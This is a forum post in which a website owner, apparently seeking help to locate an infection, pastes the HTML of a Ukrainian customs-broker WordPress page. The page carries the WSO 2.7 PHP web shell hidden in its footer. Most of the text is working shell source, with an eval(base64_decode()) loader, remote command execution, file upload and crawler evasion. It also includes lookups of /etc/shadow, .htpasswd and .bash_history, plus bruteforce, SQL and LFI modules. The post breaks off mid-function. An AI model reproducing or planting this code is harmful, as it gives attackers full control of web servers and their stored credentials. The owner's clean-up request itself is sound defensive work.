• Good afternoon, dear forum members.
    I have a problem: I can't find a virus.
    The antivirus detects it as PHP: Shell-AA [Trj]
    I managed to grab the source code … the antivirus won't let me save it as html.
    Here is the code itself:

    <!-- startovaya -->
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" lang="ru-RU">
    <head profile="http://gmpg.org/xfn/11">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
    <title>|</title>
    <script type="text/javascript" src="http://www.ved.kiev.ua/wp-content/themes/ved28/script.js"></script>
    <link rel="stylesheet" href="http://www.ved.kiev.ua/wp-content/themes/ved28/style.css" type="text/css" media="screen" />
    <!--[if IE 6]><link rel="stylesheet" href="http://www.ved.kiev.ua/wp-content/themes/ved28/style.ie6.css" type="text/css" media="screen" /><![endif]-->
    <!--[if IE 7]><link rel="stylesheet" href="http://www.ved.kiev.ua/wp-content/themes/ved28/style.ie7.css" type="text/css" media="screen" /><![endif]-->
    <!--[if lt IE 8]>
    <style>
    .art-sidebar1 #mycategoryorder-3 {
    height:230px;
    }
    </style>
    <![endif]-->
    <link rel="alternate" type="application/rss+xml" title="RSS-лента " href="http://www.ved.kiev.ua/feed/" />
    <link rel="alternate" type="application/atom+xml" title="Atom-лента " href="http://www.ved.kiev.ua/feed/atom/" />
    <link rel="pingback" href="http://www.ved.kiev.ua/xmlrpc.php" />
    <link rel='stylesheet' id='contact-form-7-css'  href='http://www.ved.kiev.ua/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=3.9.1' type='text/css' media='all' />
    <script type='text/javascript' src='http://www.ved.kiev.ua/wp-includes/js/jquery/jquery.js?ver=1.11.0'></script>
    <script type='text/javascript' src='http://www.ved.kiev.ua/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script>
    <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.ved.kiev.ua/xmlrpc.php?rsd" />
    <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.ved.kiev.ua/wp-includes/wlwmanifest.xml" /> 
    
    <meta http-equiv="Content-Language" content="ru-RU" />
    <style type="text/css" media="screen">
    .qtrans_flag span { display:none }
    .qtrans_flag { height:12px; width:18px; display:block }
    .qtrans_flag_and_text { padding-left:20px }
    .qtrans_flag_RU { background:url(http://www.ved.kiev.ua/wp-content/plugins/qtranslate/flags/ru.png) no-repeat }
    .qtrans_flag_UK { background:url(http://www.ved.kiev.ua/wp-content/plugins/qtranslate/flags/ua.png) no-repeat }
    </style>
    <link hreflang="UK" href="http://www.ved.kiev.ua/?lang=UK" rel="alternate" />
    
    <!-- All in One SEO Pack 2.2.2 by Michael Torbert of Semper Fi Web Design[371,378] -->
    <link rel='next' href='http://www.ved.kiev.ua/page/2/' />
    
    <!-- /all in one seo pack -->
    <script type="text/javascript">
    (function(url){
    if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }
    var wfscr = document.createElement('script');
    wfscr.type = 'text/javascript';
    wfscr.async = true;
    wfscr.src = url + '&r=' + Math.random();
    (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
    })('//www.ved.kiev.ua/wp-admin/admin-ajax.php?action=wordfence_logHuman&hid=258B8D4BD3873E3485AC9895DE418C0B');
    </script><script type="text/javascript">
    
      var _gaq = _gaq || [];
      _gaq.push(['_setAccount', 'UA-17105861-26']);
      _gaq.push(['_setDomainName', '.ved.kiev.ua']);
      _gaq.push(['_trackPageview']);
    
      (function() {
        var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
        ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
        var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
      })();
    
    </script>
    </head>
    <body>
    <div id="art-page-background-simple-gradient">
    </div>
    <div id="art-main">
    <div class="art-Sheet">
        <div class="art-Sheet-cc"></div>
        <div class="art-Sheet-body">
    <div class="art-Header">
        <div class="art-Header-jpeg"></div>
    <div class="art-Logo">
        <h1 id="name-text" class="art-Logo-name">
            <a href="http://www.ved.kiev.ua/"></a></h1>
        <div id="slogan-text" class="art-Logo-text">
            </div>
    </div>
    
    </div>
    <div class="langs-switch"><a href=""><img src="/wp-content/plugins/qtranslate/flags/ua.png" width="18" height="12" alt="" border="0"></a>&nbsp;&nbsp;
    <a href=""><img src="/wp-content/plugins/qtranslate/flags/ru.png" width="18" height="12" alt="" border="0"></a></div>
    
    <div class="art-contentLayout">
    <br />
    <b>Warning</b>:  include(/home/nvpvidos/ved.kiev.ua/www/wp-content/themes/ved28/sidebar1.php): failed to open stream: No such file or directory in <b>/home/nvpvidos/ved.kiev.ua/www/wp-content/themes/ved28/front-page.php</b> on line <b>4</b><br />
    <br />
    <b>Warning</b>:  include(): Failed opening '/home/nvpvidos/ved.kiev.ua/www/wp-content/themes/ved28/sidebar1.php' for inclusion (include_path='.:/usr/local/pear') in <b>/home/nvpvidos/ved.kiev.ua/www/wp-content/themes/ved28/front-page.php</b> on line <b>4</b><br />
    <div class="art-content">
    
    <div class="art-Post">
        <div class="art-Post-body">
    <div class="art-Post-inner art-article">
    
    <div class="art-PostContent">
    
    </div>
    <div class="cleared"></div>
    
    </div>
    
    		<div class="cleared"></div>
        </div>
    </div>
    
    <div class="art-Post">
        <div class="art-Post-body">
    <div class="art-Post-inner art-article">
    <div class="art-PostMetadataHeader">
    <h2 class="art-PostHeader">
    <a href="http://www.ved.kiev.ua/o-kompanii/" rel="bookmark" title="Постоянная ссылка на О КОМПАНИИ">
    О КОМПАНИИ</a>
    </h2>
    
    </div>
    <div class="art-PostContent">
    
              <p><strong>Компания ООО «ВЭДЛАЙН УКРАИНА», действующая на основании лицензии АЕ 272025, предоставляет полный спектр таможенно-брокерских услуг на всех грузовых отделах Киевской межрегиональной таможни Миндоходов и Киевской таможни Миндоходов (Борисполь).</strong></p>
    <p><strong>Профессиональный, качественный и комплексный подход к каждому Клиенту лично. Гибкая система оплаты услуг. Квалифицированные сотрудники.</strong></p>
    <p><strong>– заполнение и оформление предварительных таможенных деклараций и уведомлений</strong><br />
    <strong> – консультации по внешнеэкономической деятельности, прогнозирование возможных рисков и затрат заказчика.</strong><br />
    <strong> – консультации по тарифному регулированию</strong><br />
    <strong> – оптимизация таможенных расходов</strong><br />
    <strong> – составление внешнеэкономических контрактов, инвойсов, заполнение транспортных документов – CMR, CARNET TIR, экологических деклараций.</strong><br />
    <strong> – таможенное оформление грузов на любом ТГО г.Киева.</strong><br />
    <strong> – оформление на всех курьерских службах грузов любой сложности (М-16, грузы до 100/300 евро)</strong><br />
    <strong> – аккредитация субъектов ВЭД</strong><br />
    <strong> – предварительный расчет платежей</strong><br />
    <strong> – подбор кода по УКТВЭД</strong><br />
    <strong> – предоставляем услуги по оформлению всех разрешительных документов (гигиенические заключения, сертификация, энергосбережение, укрчастотнадзор и прочие)</strong></p>
    <p><span style="color: #000080;">__________________________________________________________________________________________________________________</span>_</p>
    <p style="text-align: left;"><strong>НАШИ КЛИЕНТЫ:</strong></p>
    <p style="text-align: left;"><strong><img class="alignleft size-medium wp-image-420" title="Bosch1" src="http://www.ved.kiev.ua/wp-content/uploads/2011/07/Bosch1-300x54.png" alt="" width="300" height="54" /> </strong></p>
    <p style="text-align: left;"><img class="size-full wp-image-125 alignleft" style="margin: 20px; border: 0px none currentColor;" title="logo" src="http://www.ved.kiev.ua/wp-content/uploads/2011/07/logo.png" alt="" width="213" height="50" /></p>
    <p style="text-align: left;"><img class="alignleft size-medium wp-image-424" title="Безымянный3" src="http://www.ved.kiev.ua/wp-content/uploads/2011/07/Безымянный3-300x33.png" alt="" width="300" height="33" /></p>
    <p style="text-align: left;"><img class="alignleft size-medium wp-image-426" title="Безымянный33" src="http://www.ved.kiev.ua/wp-content/uploads/2011/07/Безымянный331-300x41.png" alt="" width="300" height="41" /></p>
    <p style="text-align: left;"><img class="alignleft size-medium wp-image-423" title="Безымянный" src="http://www.ved.kiev.ua/wp-content/uploads/2011/07/Безымянный2-300x140.png" alt="" width="300" height="140" /></p>
    <p style="text-align: left;"><img class="alignleft size-medium wp-image-448" title="Miro-MIX_03" src="http://www.ved.kiev.ua/wp-content/uploads/2011/07/Miro-MIX_03-300x79.gif" alt="" width="300" height="79" /></p>
    <p>&nbsp;</p>
    
    </div>
    <div class="cleared"></div>
    
    </div>
    
    		<div class="cleared"></div>
        </div>
    </div>
    
    </div>
    
    </div>
    <div class="cleared"></div>
    
    <div class="art-Footer">
        <div class="art-Footer-inner">
                    <a href="http://www.ved.kiev.ua/feed/" class="art-rss-tag-icon" title="RSS"></a>
                    <div class="art-Footer-text">
    <p>
    <p style="text-align: center;" id="footer-text">Полный спектр таможенно-брокерских услуг в Киеве. "ВЭДЛАЙН" - Все права защищены.</p>
    <p style="text-align: center;" id="footer-text"><a href="http://pechati.kiev.ua">печати и штампы</a></p>
    
    <?php
    /* WSO 2.7 (404 Error Web Shell by Madleets.com) */
    /*Maded by DrSpy*/
    $auth_pass = "c1c425268e68385d1ab5074c17a94f14";
    $color = "#df5";
    $default_action = 'FilesMan';
    $default_use_ajax = true;
    $default_charset = 'Windows-1251';
    
    if(!empty($_SERVER['HTTP_USER_AGENT'])) {
        $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
        if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
            header('HTTP/1.0 404 Not Found');
            exit;
        }
    }
    
    @session_start();
    @ini_set('error_log',NULL);
    @ini_set('log_errors',0);
    @ini_set('max_execution_time',0);
    @set_time_limit(0);
    @set_magic_quotes_runtime(0);
    @define('WSO_VERSION', '2.7');
    
    if(get_magic_quotes_gpc()) {
    	function WSOstripslashes($array) {
    		return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    	}
    	$_POST = WSOstripslashes($_POST);
    }
    
    function wsoLogin() {
    	die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
    }
    
    if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
    	if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
    		$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    	else
    		wsoLogin();
    
    if(strtolower(substr(PHP_OS,0,3)) == "win")
    	$os = 'win';
    else
    	$os = 'nix';
    
    $safe_mode = @ini_get('safe_mode');
    if(!$safe_mode)
        error_reporting(0);
    
    $disable_functions = @ini_get('disable_functions');
    $home_cwd = @getcwd();
    if(isset($_POST['c']))
    	@chdir($_POST['c']);
    $cwd = @getcwd();
    if($os == 'win') {
    	$home_cwd = str_replace("\\", "/", $home_cwd);
    	$cwd = str_replace("\\", "/", $cwd);
    }
    if( $cwd[strlen($cwd)-1] != '/' )
    	$cwd .= '/';
    
    $wsobuff = "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";
    eval(base64_decode($wsobuff));
    
    if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax']))
        $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$GLOBALS['default_use_ajax'];
    
    if($os == 'win')
    	$aliases = array(
    		"List Directory" => "dir",
        	"Find index.php in current dir" => "dir /s /w /b index.php",
        	"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
        	"Show active connections" => "netstat -an",
    
        	"Show running services" => "net start",
        	"User accounts" => "net user",
        	"Show computers" => "net view",
    		"ARP Table" => "arp -a",
    		"IP Configuration" => "ipconfig /all"
    	);
    else
    	$aliases = array(
      		"List dir" => "ls -lha",
    		"list file attributes on a Linux second extended file system" => "lsattr -va",
      		"show opened ports" => "netstat -an | grep -i listen",
            "process status" => "ps aux",
    		"Find" => "",
      		"find all suid files" => "find / -type f -perm -04000 -ls",
      		"find suid files in current dir" => "find . -type f -perm -04000 -ls",
      		"find all sgid files" => "find / -type f -perm -02000 -ls",
      		"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
      		"find config.inc.php files" => "find / -type f -name config.inc.php",
      		"find config* files" => "find / -type f -name \"config*\"",
      		"find config* files in current dir" => "find . -type f -name \"config*\"",
      		"find all writable folders and files" => "find / -perm -2 -ls",
      		"find all writable folders and files in current dir" => "find . -perm -2 -ls",
      		"find all service.pwd files" => "find / -type f -name service.pwd",
      		"find service.pwd files in current dir" => "find . -type f -name service.pwd",
      		"find all .htpasswd files" => "find / -type f -name .htpasswd",
      		"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
      		"find all .bash_history files" => "find / -type f -name .bash_history",
      		"find .bash_history files in current dir" => "find . -type f -name .bash_history",
      		"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
      		"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
    		"Locate" => "",
      		"locate httpd.conf files" => "locate httpd.conf",
    		"locate vhosts.conf files" => "locate vhosts.conf",
    		"locate proftpd.conf files" => "locate proftpd.conf",
    		"locate psybnc.conf files" => "locate psybnc.conf",
    		"locate my.conf files" => "locate my.conf",
    		"locate admin.php files" =>"locate admin.php",
    		"locate cfg.php files" => "locate cfg.php",
    		"locate conf.php files" => "locate conf.php",
    		"locate config.dat files" => "locate config.dat",
    		"locate config.php files" => "locate config.php",
    		"locate config.inc files" => "locate config.inc",
    		"locate config.inc.php" => "locate config.inc.php",
    		"locate config.default.php files" => "locate config.default.php",
    		"locate config* files " => "locate config",
    		"locate .conf files"=>"locate '.conf'",
    		"locate .pwd files" => "locate '.pwd'",
    		"locate .sql files" => "locate '.sql'",
    		"locate .htpasswd files" => "locate '.htpasswd'",
    		"locate .bash_history files" => "locate '.bash_history'",
    		"locate .mysql_history files" => "locate '.mysql_history'",
    		"locate .fetchmailrc files" => "locate '.fetchmailrc'",
    		"locate backup files" => "locate backup",
    		"locate dump files" => "locate dump",
    		"locate priv files" => "locate priv"
    	);
    
    function wsoHeader() {
    	if(empty($_POST['charset']))
    		$_POST['charset'] = $GLOBALS['default_charset'];
    	global $color;
    	echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."</title>
    <style>
    body{background-color:#444;color:#e1e1e1;}
    body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
    table.info{ color:#fff;background-color:#222; }
    span,h1,a{ color: $color !important; }
    span{ font-weight: bolder; }
    h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
    div.content{ padding: 5px;margin-left:5px;background-color:#333; }
    a{ text-decoration:none; }
    a:hover{ text-decoration:underline; }
    .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
    .bigarea{ width:100%;height:250px; }
    input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
    form{ margin:0px; }
    #toolsTbl{ text-align:center; }
    .toolsInp{ width: 300px }
    .main th{text-align:left;background-color:#5e5e5e;}
    .main tr:hover{background-color:#5e5e5e}
    .l1{background-color:#444}
    .l2{background-color:#333}
    pre{font-family:Courier,Monospace;}
    </style>
    <script>
        var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
        var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
        var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
        var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
        var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
        var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
        var d = document;
    	function set(a,c,p1,p2,p3,charset) {
    		if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
    		if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
    		if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
    		if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
    		if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
    		if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
    	}
    	function g(a,c,p1,p2,p3,charset) {
    		set(a,c,p1,p2,p3,charset);
    		d.mf.submit();
    	}
    	function a(a,c,p1,p2,p3,charset) {
    		set(a,c,p1,p2,p3,charset);
    		var params = 'ajax=true';
    		for(i=0;i<d.mf.elements.length;i++)
    			params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
    		sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
    	}
    	function sr(url, params) {
    		if (window.XMLHttpRequest)
    			req = new XMLHttpRequest();
    		else if (window.ActiveXObject)
    			req = new ActiveXObject('Microsoft.XMLHTTP');
            if (req) {
                req.onreadystatechange = processReqChange;
                req.open('POST', url, true);
                req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
                req.send(params);
            }
    	}
    	function processReqChange() {
    		if( (req.readyState == 4) )
    			if(req.status == 200) {
    				var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
    				var arr=reg.exec(req.responseText);
    				eval(arr[2].substr(0, arr[1]));
    			} else alert('Request error!');
    	}
    </script>
    <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
    <form method=post name=mf style='display:none;'>
    <input type=hidden name=a>
    <input type=hidden name=c>
    <input type=hidden name=p1>
    <input type=hidden name=p2>
    
    <input type=hidden name=p3>
    <input type=hidden name=charset>
    </form>";
    	$freeSpace = @diskfreespace($GLOBALS['cwd']);
    	$totalSpace = @disk_total_space($GLOBALS['cwd']);
    	$totalSpace = $totalSpace?$totalSpace:1;
    	$release = @php_uname('r');
    	$kernel = @php_uname('s');
    	if(!function_exists('posix_getegid')) {
    		$user = @get_current_user();
    		$uid = @getmyuid();
    		$gid = @getmygid();
    		$group = "?";
    	} else {
    		$uid = @posix_getpwuid(posix_geteuid());
    		$gid = @posix_getgrgid(posix_getegid());
    		$user = $uid['name'];
    		$uid = $uid['uid'];
    		$group = $gid['name'];
    		$gid = $gid['gid'];
    	}
    
    	$cwd_links = '';
    	$path = explode("/", $GLOBALS['cwd']);
    	$n=count($path);
    	for($i=0; $i<$n-1; $i++) {
    		$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
    		for($j=0; $j<=$i; $j++)
    			$cwd_links .= $path[$j].'/';
    		$cwd_links .= "\")'>".$path[$i]."/</a>";
    	}
    
    	$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
    	$opt_charsets = '';
    	foreach($charsets as $item)
    		$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
    
    	$m = array('Sec Info'=>'SecInfo','Files'=>'FilesMan','Exec'=>'Console','Sql'=>'Sql','PHP Tools'=>'phptools','LFI'=>'lfiscan','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','XSS Shell'=>'XSSShell','Bruteforce'=>'Bruteforce','Network'=>'Network');
    	if(!empty($GLOBALS['auth_pass']))
    		$m['Logout'] = 'Logout';
    	$m['Self remove'] = 'SelfRemove';
    	$menu = '';
    	foreach($m as $k => $v)
    		$menu .= '<th width="'.(int)(100/count($m)).'%">[<a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a>]</th>';
    
    	$drives = "";
    	if($GLOBALS['os'] == 'win') {
    		foreach(range('c','z') as $drive)
    		if(is_dir($drive.':\\'))
    			$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
    	}
    	echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'
           . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' </nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>')
           . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'
           . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'
           . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
    }
    
    function wsoFooter() {
    	$is_writable = is_writable($GLOBALS['cwd'])?" <font color='#25ff00'>(Writeable)</font>":" <font color=red>(Not writable)</font>";
        echo "
    
    </div>
    <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
    	<tr>
    		<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
    		<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
    	</tr><tr>
    		<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
    		<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
    
    	</tr><tr>
    		<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
    		<td><form method='post' ENCTYPE='multipart/form-data'>
    		<input type=hidden name=a value='FilesMAn'>
    		<input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
    		<input type=hidden name=p1 value='uploadFile'>
    		<input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
    		<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
    
    	</tr></table></div></body></html>";
    }
    
    if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {
        function posix_getpwuid($p) {return false;} }
    if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {
        function posix_getgrgid($p) {return false;} }
    
    function wsoEx($in) {
    	$out = '';
    	if (function_exists('exec')) {
    		@exec($in,$out);
    		$out = @join("\n",$out);
    	} elseif (function_exists('passthru')) {
    		ob_start();
    		@passthru($in);
    		$out = ob_get_clean();
    	} elseif (function_exists('system')) {
    		ob_start();
    		@system($in);
    		$out = ob_get_clean();
    	} elseif (function_exists('shell_exec')) {
    		$out = shell_exec($in);
    	} elseif (is_resource($f = @popen($in,"r"))) {
    		$out = "";
    		while(!@feof($f))
    			$out .= fread($f,1024);
    		pclose($f);
    	}
    	return $out;
    }
    function wsoViewSize($s) {
    	if($s >= 1073741824)
    		return sprintf('%1.2f', $s / 1073741824 ). ' GB';
    	elseif($s >= 1048576)
    		return sprintf('%1.2f', $s / 1048576 ) . ' MB';
    	elseif($s >= 1024)
    		return sprintf('%1.2f', $s / 1024 ) . ' KB';
    	else
    		return $s . ' B';
    }
    
    function wsoPerms($p) {
    	if (($p & 0xC000) == 0xC000)$i = 's';
    	elseif (($p & 0xA000) == 0xA000)$i = 'l';
    	elseif (($p & 0x8000) == 0x8000)$i = '-';
    	elseif (($p & 0x6000) == 0x6000)$i = 'b';
    	elseif (($p & 0x4000) == 0x4000)$i = 'd';
    	elseif (($p & 0x2000) == 0x2000)$i = 'c';
    	elseif (($p & 0x1000) == 0x1000)$i = 'p';
    	else $i = 'u';
    	$i .= (($p & 0x0100) ? 'r' : '-');
    	$i .= (($p & 0x0080) ? 'w' : '-');
    	$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
    	$i .= (($p & 0x0020) ? 'r' : '-');
    	$i .= (($p & 0x0010) ? 'w' : '-');
    	$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
    	$i .= (($p & 0x0004) ? 'r' : '-');
    	$i .= (($p & 0x0002) ? 'w' : '-');
    	$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
    	return $i;
    }
    
    function wsoPermsColor($f) {
    	if (!@is_readable($f))
    		return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
    	elseif (!@is_writable($f))
    		return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
    	else
    		return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
    }
    
    if(!function_exists("scandir")) {
    	function scandir($dir) {
    		$dh  = opendir($dir);
    		while (false !== ($filename = readdir($dh)))
        		$files[] = $filename;
    		return $files;
    	}
    }
    
    function wsoWhich($p) {
    	$path = wsoEx('which ' . $p);
    	if(!empty($path))
    		return $path;
    	return false;
    }
    
    function actionSecInfo() {
    	wsoHeader();
    	echo '<h1>Server security information</h1><div class=content>';
    	function wsoSecParam($n, $v) {
    		$v = trim($v);
    		if($v) {
    			echo '<span>' . $n . ': </span>';
    			if(strpos($v, "\n") === false)
    				echo $v . '<br>';
    			else
    				echo '<pre class=ml1>' . $v . '</pre>';
    		}
    	}
    
    	wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
        if(function_exists('apache_get_modules'))
            wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
    	wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
    	wsoSecParam('Open base dir', @ini_get('open_basedir'));
    	wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
    	wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
    	wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
    	$temp=array();
    	if(function_exists('mysql_get_client_info'))
    		$temp[] = "MySql (".mysql_get_client_info().")";
    	if(function_exists('mssql_connect'))
    		$temp[] = "MSSQL";
    	if(function_exists('pg_connect'))
    		$temp[] = "PostgreSQL";
    	if(function_exists('oci_connect'))
    		$temp[] = "Oracle";
    	wsoSecParam('Supported databases', implode(', ', $temp));
    	echo '<br>';
    
    	if($GLOBALS['os'] == 'nix') {
    		wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
    		wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
    		wsoSecParam('OS version', @file_get_contents('/proc/version'));
    		wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
    		if(!$GLOBALS['safe_mode']) {
                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
    			echo '<br>';
    			$temp=array();
    			foreach ($userful as $item)
    				if(wsoWhich($item))
                        $temp[] = $item;
    			wsoSecParam('Userful', implode(', ',$temp));
    			$temp=array();
    			foreach ($danger as $item)
    				if(wsoWhich($item))
                        $temp[] = $item;
    			wsoSecParam('Danger', implode(', ',$temp));
    			$temp=array();
    			foreach ($downloaders as $item)
    				if(wsoWhich($item))
                        $temp[] = $item;
    			wsoSecParam('Downloaders', implode(', ',$temp));
    			echo '<br/>';
                wsoSecParam('HDD space', wsoEx('df -h'));
    			wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
    		}
    	} else {
    		wsoSecParam('OS Version',wsoEx('ver'));
    		wsoSecParam('Account Settings',wsoEx('net accounts'));
    		wsoSecParam('User Accounts',wsoEx('net user'));
    	}
    	echo '</div>';
    	wsoFooter();
    }
    function actionlfiscan() {
        wsoHeader();
        print '
       <h3>Led-Zeppelin\'s LFI File dumper</h3>
    
       <form method="post" action="?"><input type="hidden" name="a" value="lfiscan">
          LFI URL: <input type="text" size="60" name="lfiurl" value=""> <input type="submit" value="Go"> File: <select name="scantype">
             <option value="1">
